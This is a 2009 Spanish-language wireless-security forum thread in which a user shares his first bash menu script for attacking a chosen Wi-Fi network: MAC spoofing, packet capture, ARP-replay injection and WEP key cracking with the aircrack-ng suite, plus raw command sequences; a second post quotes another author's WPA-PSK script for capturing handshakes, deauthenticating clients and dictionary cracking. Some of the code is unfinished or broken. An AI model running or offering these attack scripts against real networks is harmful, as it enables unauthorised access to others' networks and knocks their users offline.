Seguridad Wireless - Wifi
Sistemas operativos => Zona GNU/Linux => Mensaje iniciado por: iea en 14-03-2009, 23:09 (Sábado)
-
Pues nada estoi, intentando hacer mi primer scripts
#!/bin/sh
#SCRIPT CREADO POR IEA
#Variables
#DECLARANDO LAS FUNCIONES
inicio ()
{
clear
unset n
cat <<INICIO
|Escoge una opción y pulsa enter|
- Leer datos de la Red a atacar e interface #entrada_datos
[1] Entrada de datos de la Red #entrada_datos
[2] Ataque 1 # ataque1
[3] Ataque 2 # ataque2
[4] Crakear # crack
[5] Escanear redes #escanear
[6] Ayuda
[7] Salir
INICIO
read n
if [ $n -eq 1 ]; then
entrada_datos
elif [ $n -eq 0 ]; then
clear
lee
elif [ $n -eq 2 ]; then
ataque1
elif [ $n -eq 3 ]; then
ataque2
elif [ $n -eq 4 ]; then
crack
elif [ $n -eq 5 ]; then
escanear
elif [ $n -eq 6 ]; then
ayuda
elif [ $n -eq 7 ]; then
salir
fi
}
clear
lee ()
{
unset m
cat <<lee
|Selecciona una opción y pulsa enter|
[1] Essid
[2] Bessid
[3] Canal
[4] Interface
[5] Falsa Mac
[6] Salir de las selecciones
lee
read m
clear
if [ $m -eq 1 ]; then
cat <<entrada_datos
[-]Nombre del ESSID Red a atacar
entrada_datos
read essid
lee
elif [ $m -eq 2 ]; then
cat <<entrada_datos
[-]" Mac del AP, a atacar, alias bssid "
entrada_datos
read bssid
lee
elif [ $m -eq 3 ]; then
cat <<entrada_datos
[-]Canal de la red atacada
entrada_datos
read canal
lee
elif [ $m -eq 4 ]; then
cat <<entrada_datos
[-]Interface atacante
entrada_datos
read interface
lee
elif [ $m -eq 5 ]; then
cat <<entrada_datos
[-]Mac Falsa atacante
entrada_datos
read mac_falsa
lee
elif [ $m -eq 6 ]; then
# inicio #BORRAR AL FINAL DE PROGRAMAR
clear
echo "Datos obtenidos ==> "
echo "Essid de red ==> "$essid
echo "Bssid de red ==> "$bssid
echo "esta en el canal ==> "$canal
echo "esta en el canal ==> "$interface
echo "Falsa mac atacante ==> "$mac_falsa
sleep 4
inicio
else
lee
fi
}
##FUNCIÓN entrada_datos
entrada_datos ()
{
clear
cat <<entrada_datos
[-]Nombre del ESSID Red a atacar
entrada_datos
read essid
clear
cat <<entrada_datos
[-]Mac del AP, a atacar, alias bssid
entrada_datos
read bssid
clear
cat <<entrada_datos
[-]Canal de la red atacada
entrada_datos
read canal
clear
cat <<entrada_datos
[-]Interface atacante
entrada_datos
read interface
clear
cat <<entrada_datos
[-]Mac Falsa atacante
entrada_datos
read mac_falsa
clear
clear
echo "Datos obtenidos ==> "
echo "Essid de red ==> "$essid
echo "Bssid de red ==> "$bssid
echo "esta en el canal ==> "$canal
echo "Falsa mac atacante ==> "$mac_falsa
echo "Interface seleccionada ==> "$interface
sleep 4
inicio
}
##FUNCIÓN DESTRUIR
destruir ()
{
clear
airmon-ng stop $interface | ifconfig $interface down | macchanger --mac $mac_falsa $interface
xterm & airmon-ng start $interface
sleep 2
inicio
}
##FUNCIÓN ataque1
ataque1 ()
{
clear
airmon-ng stop $interface | ifconfig $interface down | macchanger --mac $mac_falsa $interface | airmon-ng start $interface
iwconfig $interface rate 1M
xterm -hold -e airodump-ng -c $canal -w /1 --bssid $bssid $interface | xterm -hold -e aireplay-ng -1 6000 -o 1 -q 10 -e $essid -a $bssid -h $mac_falsa $interface | xterm -hold -e aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b $bssid -h $bssid $interface
# | aircrack-ng /1-0*.cap
# aireplay-ng -4 -b $bssid -h $bssid $interface
sleep 1
clear
inicio
}
ataque2 ()
{
clear
airmon-ng stop $interface | ifconfig $interface down | macchanger --mac $mac_falsa $interface | airmon-ng start $interface
iwconfig $interface rate 1M
xterm -hold -e airodump-ng -c $canal -w /1 --bssid $bssid $interface |
xterm -hold -e aireplay-ng -1 0 -e $essid -a $bssid -h $mac_falsa $interface |
xterm -hold -e aireplay-ng -4 -b $bssid -h $mac_falsa $interface |
xterm -hold -e acketforge-ng -0 -a $bssid -h $mac_falsa -k 255.255.255.255 -l 255.255.255.255.2555 -y replay_dec-xxxx-xxxxxx.xor -w arp-request |
xterm -hold -e aireplay-ng -2 -r arp-request $interface |
# | aircrack-ng /1-0*.cap
# aireplay-ng -4 -b $bssid -h $bssid $interface
sleep 1
clear
inicio
}
##FUNCIÓN AYUDA
ayuda ()
{
clear
unset volver_ayuda
cat <<AYUDA
======================
| AYUDA |
======================
Goglea un poco y aprrende
U pon Find *.sh en / y lee mas
[1] Volver Atrás (al menú principal)
AYUDA
read volver_ayuda
if [ $volver_ayuda -eq 1 ]; then
inicio
fi
}
##FUNCION SALIR
salir ()
{
clear
cat <<SALIR
=====================================
| GRACIAS POR UTILIZAR ESTE PROGRAMA |
| AUTOR: iea |
| Hasta pronto |
| . |
=====================================
SALIR
sleep 0
exit
}
##ESCANEAR REDES bg?
escanear ()
{
clear
interface=wlan0 #recordar quitar cuando este terminado
mac_falsa=00:11:22:33:44:55
macchanger -m $mac_falsa $interface
airodump-ng $interface
## xterm -hold -e airodump-ng $interface | no se xp coño no funciona en otra terminal
sleep 4
clear
inicio
}
##FUNCIÓN CRACK
crack ()
{
clear
aircrack-ng /1-0*.cap
sleep 2
inicio
}
#INICIO DEL SCRIPT
inicio
-
Es el primero,bach que hago y para no tener ni idea, y hacer un corta y pega de aqui y otro de alli, pues eso ya veis....
Contras el segundo ataque no me funciona xp esta a medio programar, faltan por declacar funciones de los nombre de ficheros.. para el pakeforge...
Una cosa buena q he incluido, que se puede seleccionar la mac del atacante...
Hay dos formas de meter los datos de la red a estudiar...
Otra cosa buena es que cada vez, que se ataca, se auto configura la interface...y su mac.
El ataque uno rula..
Lo malo que al escanear redes, no soy quien a hacer que se abra en otro terminal...con las redes disponibles...(para poderlo cortar y pegar, pero me conformo con verlo)
Resumiendo mi umilde intencion es meter, estas dos retailas, + o - en un sh pero que lea las variables que yo le meta...
Lo que me preocupa es el funcionamiento de xterm -hold -e que no encuentro ej de como funciona y es la clave para los ataque en distintas terminales, el comando konsola no es bueno xp siempre se cierra y este no...
************************************************
ifconfig wlan1 192.168.1.55
route add default gateway 192.168.1.1 wlan1
# airodump-ng wlan1
airmon-ng stop wlan1 && ifconfig wlan1 down && macchanger --mac 00:0e:wlan1 && airmon-ng start wlan1
iwconfig wlan1 rate 1M
airodump-ng -c 5 -w /WLAN_25 --bssid 00:01: wlan1
aireplay-ng -1 6000 -o 1 -q 10 -e W5 -a 00:01:38 -h 00:0e:3 wlan1
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b 00:02: -h 00:0e: wlan1
aircrack-ng /W-0*.cap por defecto e lo root
ver mac filtrado aireplay-ng -4 -b 00:02:cf -h 00:0e: wlan1
****************************2
airmon-ng stop wlan1
ifconfig wlan1 down
macchanger --mac 00:11:22:33:44:55 wlan1
airmon-ng start wlan1
#airodump-ng wlan1 ver lo que hay
iwconfig wlan1 rate 1M
airodump-ng -c 6 -w /J --bssid 00:11:F5: wlan1
aireplay-ng -1 0 -e J -a 00:01:3 -h 00:16: wlan1
aireplay-ng -4 -b 00:15:: -h 00:11:22:33:44:55 wlan1
packetforge-ng -0 -a 00:11:F5: -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255.2555 -y replay_dec-xxxx-xxxxxx.xor -w arp-request
aireplay-ng -2 -r arp-request wlan0
aircrack-ng -n 64 -z -f 1 -e J -b 00:11:F5 /J-0*.cap
***********************************
Bueno si alguno lo quiere mirar y dar ideas, seran bien dadas..
Pero el que me quiera ayudar que ponga ejemplos xp como dije no tengo ni mucha ni si poca idea...
Gracias
javascript:replaceText(' >:(', document.forms.postmodify.message)
agradecido
-
Bueno aunque tenga poco que ver con mi pos hos cuento he encontrado esto:
#!/bin/bash
# airoWPA-PSK.sh v0.1
# written by ka0x <ka0x01[at]gmail.com>
if [ $UID != 0 ]; then
echo "[!] NECESITAS EJECUTAR EL SCRIPT $0 CON PRIVILEJIOS DE SUPERUSUARIO"
exit
fi
comprueba_mac(){
if [ ! "${#1}" -eq "17" ]; then
echo -e "\033[31mMac Incorrecta\n\033[0m"
exit
fi
}
interfaces() {
echo -e "\n\033[31m- Seleccione la interfaz que va a utilizar: \033[0m\n"
INTERFACES=$(iwconfig | grep ESSID | awk '{ print $1 }')
select INTER in $INTERFACES; do
break;
done
clear
}
monitor(){
airmon-ng start $INTER
clear
menu
}
handshake(){
clear
read -p "[-] Introduzca la MAC del AP: " mac_ap
comprueba_mac $mac_ap
read -p "[-] Introduzca la MAC del Cliente: " mac_client
comprueba_mac $mac_client
read -p "[-] Introduzca el canal del AP: " mac_chanel
read -p "[-] Nombre de archivo donde se guardaran los datos capturados: " datas
xterm -hold -title "Obteniendo Handshake en $mac_ap" -geometry 96x60+0+0 -bg "#000000" -fg "#FFFFFF" -e airodump-ng --bssid $mac_ap -c $mac_chanel -w $datas $INTER && clear && menu
}
desautenticacion(){
clear
read -p "[-] Introduzca la MAC del AP: " mac_ap
comprueba_mac $mac_ap
read -p "[-] Introduzca la MAC del cliente asociado: " mac_cliente
comprueba_mac $mac_cliente
read -p "[-] Introduzca el numero de desautenticaciones: " num
xterm -hold -geometry 70x25-0+0 -bg "#000000" -fg "#99CCFF" -title "Desautenticando $mac_cliente del AP $mac_ap $num veces" -e aireplay-ng -0 $num -a $mac_ap -c $mac_cliente $INTER
clear
menu
}
crack_dicc(){
clear
read -p "[-] Introduzca la ruta del diccionario: " diccionario
echo "[-] Seleccione el archivo de datos capturados:"
LS_DIR=$(ls *.cap)
select DATA in $LS_DIR; do
break;
done
xterm -hold -geometry 70x25-0+0 -bg "#000000" -fg "#99CCFF" -title "Obteniendo clave con diccionario: $diccionario" -hold -e aircrack-ng -w $diccionario $DATA
menu
}
menu(){
echo -e "\n
echo -e "\033[31m-=-=-=-=-=-=-=-=-=-=-=-=-\033[0m"
echo "1 - Activar Modo Monitor"
echo "2 - Capturar handshake"
echo "3 - Desautenticar cliente"
echo "4 - Obtener clave con diccionario"
echo "5 - Salir"
echo -e "\033[31m-=-=-=-=-=-=-=-=-=-=-=-=-\n\033[0m"
read -p "opcion> " OPCION
case $OPCION in
"1") monitor;;
"2") handshake;;
"3") desautenticacion;;
"4") crack_dicc;;
"5") exit;;
*) echo -e "\033[31m[!] OPCION NO VALIDA\n\033[0m" && menu;;
esac
}
interfaces
menu
# __EOF__
Que me ha dejado acojonado puesto que estas lines + o - hace lo que yo hice...
Me refiero a la declaracion de variables y dos ataques...
Pero yo logicamente quiero tirar por el mio, mas que nada xq veo mejor el codigo...y este no me gusta que tengas que remeter, bsid,esid....
-
joder, me voy unos días y aquí se pone la gente a hacer scripts, muy bueno iea, tu sigue con tu plan >:(
a la que tenga un rato pruebo esto que has hecho y lo critico hasta la muerte ;D ;D ;D
un saludo ;)